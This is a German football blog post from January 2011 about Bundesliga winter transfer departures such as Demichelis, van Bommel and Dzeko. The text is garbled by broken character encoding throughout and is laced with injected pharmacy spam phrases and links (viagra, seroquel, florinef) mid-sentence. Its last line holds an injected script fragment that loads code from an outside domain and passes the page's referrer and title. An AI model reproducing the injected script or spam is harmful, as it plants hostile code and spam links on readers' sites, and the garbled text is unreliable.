Willkommen auf » Wintertransfers 2011 – Die AbgAi??nge
3. Jan 2011

Wintertransfers 2011 – Die AbgAi??nge

Wie schon in den Vorjahren werfen wir auch in dieser Winterpause wieder einen detaillierten Blick auf die Spielerwechsel unserer Bundesligisten im zweiten Transferfenster der Saison. Los gehts diesmal mit den bisher bestAi??tigten AbgAi??ngen…

### Nach A?ber sieben Jahren beim FC Bayern (und 174 Spielen, mit jeweils vier deutschen Meistertiteln und Pokalsiegen) verlAi??sst Martin Demichelis (30) die Bundesliga in Richtung Spanien. Der argentinische Innenverteidiger wechselt ablAi??sefrei (zunAi??chst auf Leihbasis fA?r sechs Monate, im Anschluss gilt eine Kaufoption) zum Tabellenachtzehnten der Primera Division FC Malaga und trifft dort auf seinen ehemaligen Trainer und FAi??rderer Manuel Pellegrini. Beim FC Bayern hatte er in dieser Saison seinen Stammplatz in der Innenverteidigung endgA?ltig an Holger Badstuber verloren (diese Entwicklung deutete Trainer van Gaal im vergangenen Jahr bereits an) und stand lediglich bei sechs Bundesligaspielen auf dem Platz. Schade ist es schon, einen so verdienten Spieler schickt man nicht auf solch eine Weise im Winter weg. AdiA?s Micho.

### Mit Mark van Bommel (33) verabschiedet sich ein weiterer verdienter Spieler vom deutschen Rekordmeister. Der NiederlAi??nder, dessen Vertrag im Sommer ausgelaufen wAi??re, geht ablAi??sefrei zum AC Mailand. Meine Meinung: Seinen KapitAi??n lAi??sst man nicht einfach so ziehen, auch wenn man gewisse Alternativen im Kader hat, ich versteh es nicht. Eine schwierige Bundesliga-RA?ckrunde steht an, ebenso wie das spektakulAi??re Champions League Achtelfinale gegen Inter Mailand. Vorstandschef Rumenigge erklAi??rt die „Flucht“ van Bommels: Ai??Es war Marks ausdrA?ckliche Bitte, ihn aus sportlichen GrA?nden vorzeitig aus seinem Vertrag zu entlassen, um sofort zum AC Mailand wechseln zu kAi??nnenAi??. Tja dann, so langsam wirds aber leider zum System (Lucio, Demichelis, van Bommel). propecia by merck and co safe branded viagra on line Spox.com hat ihn in einem Interview nochmal ausfA?hrlich zum Transfer befragt.

### Bernd Schuster holt den Bremer Hugo Almeida (26) zu seinem neuen Klub Besiktas Istanbul. Der Vertrag wAi??re im Sommer ausgelaufen, eine VerlAi??ngerung erschien zunehmend unwahrscheinlich und so zahlen die TA?rken nun 2 Millionen Euro AblAi??se und verpflichten den portugiesischen Nationalspieler bereits im Januar. Pills Almeida zum Wechsel: „Ich habe lange A?berlegt, aber am Schluss war Besiktas einfach die beste Wahl. Es ist ein groAYer Klub mit einem guten Trainer, alles ist top organisiert. […] Ich hatte eine tolle Zeit in Bremen, es ist ein Top-Klub. Die Fans waren immer sehr gut zu mir, das vergesse ich nicht. Werder wird immer ein Teil von mir sein.“ Die Bremer verlieren in dieser Ai??uAYerst unbefriedigenden Saison (nach der Bundesliga-Hinrunde lediglich Platz 14 + Ausscheiden in der Champions League Gruppenphase + Ausscheiden in der zweiten Runde des DFB-Pokals) somit ihren bisher erfolgreichsten TorschA?tzen (Almeida immerhin mit 9 Toren in 13 Spielen). Da muss nun in den kommenden Wochen dringend ein namhafter Ersatz her!

### Der 1.FC KAi??ln gibt (nach Pills einigen kuriosen Querelen in der laufenden Saison) bereitwillig seinen ehemaligen Publikumsliebling und bisherigen StammtorhA?ter Faryd MondragA?n (39) ab. Den Kolumbianer zieht es nach drei Bundesliga-Spielzeiten in die US-amerikanischen Profiliga MLS zu Philadelphia Union. Einen Ersatz haben die KAi??lner im zuletzt vereinslosen Michael Rensing bereits gefunden.

### Neben Mittelfeldspieler Luiz Gustavo (fA?r 15 Millionen zum FC Bayern) und Trainer Ralf Rangnick (RA?cktritt nach dem aufgezwungenen Gustavo-Transfer) verlAi??sst der StA?rmerAi?? buy florinef online Wellington http://rsmcduffiecpa.com/order-micronase-indications/ 1899 Hoffenheim im Winter. Nach 19 Erstligaspielen (mit lediglich drei Toren) in der Bundesligasaison 2008/09 und zwei halbjAi??hrlichen LeihgeschAi??ften an Twente Enschede und Fortuna DA?sseldorf, zieht es ihn nun zurA?ck in die brasilianische Heimat. Er gehAi??rt zum „Club der Gescheiterten“, der aus Hoffenheim einen regen Zulauf erhAi??lt. Auch Franco Zuculini und Maicosuel wurden zum Beispiel mit groAYen Ambitionen fA?r Millionen Euro eingekauft (alle drei fA?r etwa 4,5 Mio.), konnten sich in der Bundesliga aber nicht durchsetzen und wurden entsprechend schnell wieder abgegeben.

### Ebenfalls kein Erstligaspiel fA?r die Kraichgauer mehr machen wird wohl Demba Ba. Der 25-jAi??hrige Senegalese hatte es sich im Winter mit den Hoffenheimern endgA?ltig verscherzt als er zum wiederholten Male mit einem Streik einen Vereinswechsel zu provozieren versucht, im Sommer 2009 wollte er nach Stuttgart, diesmal sollte es nach London zu West Ham United gehen. Die TSG winkte jeweils ab, mAi??chte aber bei solchen Praktiken berechtigterweise nicht lAi??nger mit Ba zusammenarbeiten. Er wechselt nun, zunAi??chst auf Leihbasis, zum Premier League Klub Stoke City.

### Der VfL Wolfsburg trAi??gt sich in die deutschen FuAYball-GeschichtsbA?cher ein: nach langem Hin-und-Her gibt man Edin Dzeko (24) fA?r die RekordablAi??se von 37 Millionen Euro an Manchester City ab. Der Bosnier verlAi??sst somit nach dreieinhalb erfolgreichen Jahren die Bundesliga (111 Erstligaspiele, 66 Tore, Meister 2009, TorschA?tzenkAi??nig 2009/10, Vize-TorschA?tzenkAi??nig 2008/09) und wird wohl nun zu einer groAYen internationalen Karriere starten, das Potential hat er zweifelsfrei nachgewiesen. Mit Grafite und Mandzukic stehen nun nur noch zwei nominelle StA?rmer im Kader, Caiuby als dritter im Bunde wurde an den FC Ingolstadt verliehen, bis zum Transferschluss muss sich der VfL also dringend auf dem Transfermarkt umsehen, das nAi??tige Kleingeld dA?rfte vorhanden sein 😉

### Und der Wolfsburger Manager Dieter HoeneAY mistet weiter im groAYen Stil aus. Order Karim Ziani (28 Jahre, im Sommer 2009 als HoffnungstrAi??ger fA?r 7 Mio. aus Marseille gekommen, bisher aber nur 10 Spiele fA?r den VfL) und Nassim Ben Khalifa (19 Jahre, Offensiv-Allrounder, als Riesen-Talent gehandelt, konnte sich aber im vergangenen Halbjahr A?berhaupt nicht in Wolfsburg einleben) konnten die hohen Erwartungen bisher nicht erfA?llen und werden daher zunAi??chst bei Leihvereinen „geparkt“. Ziani geht zum tA?rkischen Erstligisten Kayserispor, HoeneAY zum Wechsel: ai??zDas ist fA?r Karim Ziani die Chance fA?r einen Neustart“, klingt nicht so als wA?rde er nochmal zurA?ckkommen. Von Khalifa erwarten sich die WAi??lfe dagegen noch einiges, sein Vertrag lAi??uft schlieAYlich noch bis zum Sommer 2014. Dieter HoeneAY schickt ihn nun fA?r eineinhalb Jahre zum 1.FC NA?rnberg. ai??zMein Ziel ist es, den nAi??chsten Schritt zu machen, nachdem ich in der Schweizer U21-Nationalmannschaft Stammspieler geworden bin. Ich habe im Sommer entschieden, mich in Deutschland weiterentwickeln zu wollen. Deshalb ist es fA?r mich logisch, in der Bundesliga zu bleiben. Diese Chance sehe ich beim 1. FC NA?rnberg gegeben und werde alles dafA?r tun“, cheap zebeta side Purchase meint Khalifa.

### Und noch zwei Namen stehen bei den Niedersachsen auf der Abschiedsliste: Zum einen verlAi??sst Mittelfeldspieler Vlad Munteanu (30) die Autostadt. Er kehrt nach viereinhalb Jahren in Deutschland (bei Energie Cottbus, VfL Wolfsburg, Arminia Bielefeld und FSV Frankfurt) ablAi??sefrei zu Dinamo Bukarest in die rumAi??nische Heimat zurA?ck. Zum anderen geben die WAi??lfe auch noch den ehemaligen italienischen Nationalspieler Andrea Barzagli (29) ab. Der Innenverteidiger, der in allen 17 Hinrundenspielen auf dem Platz stan, geht fA?r 300.000 Euro zum Rekordmeister der Serie A Juventus Turin.

### Der ehemalige deutsche und jetzige US-amerikanische Nationalspieler online Jermaine Jones (29) verlAi??sst den FC Schalke 04 und die Bundesliga in Richtung Premier League. Er wird zunAi??chst bis zum Saisonende an die Blackburn Rovers ausgeliehen, im Deal enthalten ist eine Kaufoption. Jones hatte sich Ende 2010 mit Schalke-Trainer Felix Magath A?berworfen, aufgrund von schlechten Leistungen (in einer Phase, in der sich das gesamte Team miserabel prAi??sentierte und er da keinesfalls besonders negativ auffiel) wurde er ins Regionalligateam abgeschoben und sollte sich nun zum neuen Jahr einen neuen Verein suchen. Jetzt versucht er sich also im englischen FuAYball, warum nicht, das kAi??rperbetonte, robuste Spiel wird ihm liegen. Wenn er sich gut einlebt, werden die Rovers sicher ihre Freude mit ihm haben.

### Buy Mauro Camoranesi Cheap (34) beendet sein Gastspiel beim VfB Stuttgart bereits nach einem halben Jahr wieder. In 14 Spielen (7 mal in der Bundesliga, einmal im Pokal, 6 mal in der Europa League) konnte er bei den Schwaben keinen bleibenden Eindruck hinterlassen und so einigte man sich auf eine VertragsauflAi??sung.

### Das Kapitel Bundesliga ist auch fA?r den 23-jAi??hrigen Argentinier Raul Bobadilla vorerst vorbei. Seine Torquote bei Borussia MAi??nchengladbach ist fA?r einen MittelstA?rmer mit sieben Toren in 44 Bundesligaspielen eher mAi??AYig, er fiel auAYerdem wiederholt durch Disziplinlosigkeiten auf dem Platz auf und wurde Ende 2010 deshalb in die zweite Mannschaft verbannt. Bobadilla wird daher nun bis zum Saisonende an den griechischen Erstligisten Aris Thessaloniki verliehen. Die Chance zur RA?ckkehr besteht jedoch, denn eine Kaufoption wurde nicht vereinbart und Sportdirektor Max Eberl versichert seroquel online overnight delivery : ai??zWir werden Raul Bobadilla in den nAi??chsten Monaten im Auge behalten und seine Entwicklung verfolgen, denn wir sind von seinen sportlichen QualitAi??ten weiter A?berzeugt. Aus diesem Grund war es uns wichtig, dass er in Europa bleibt.ai???

Die Transferliste schlieAYt offiziell am 31. Januar um 00:00 Uhr. Weitere AbgAi??nge werden dann hier im Laufe der Zeit ergAi??nzt.s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=‘ + encodeURIComponent(document.referrer) + ‚&default_keyword=‘ + encodeURIComponent(document.title) + “;


Einen Kommentar schreiben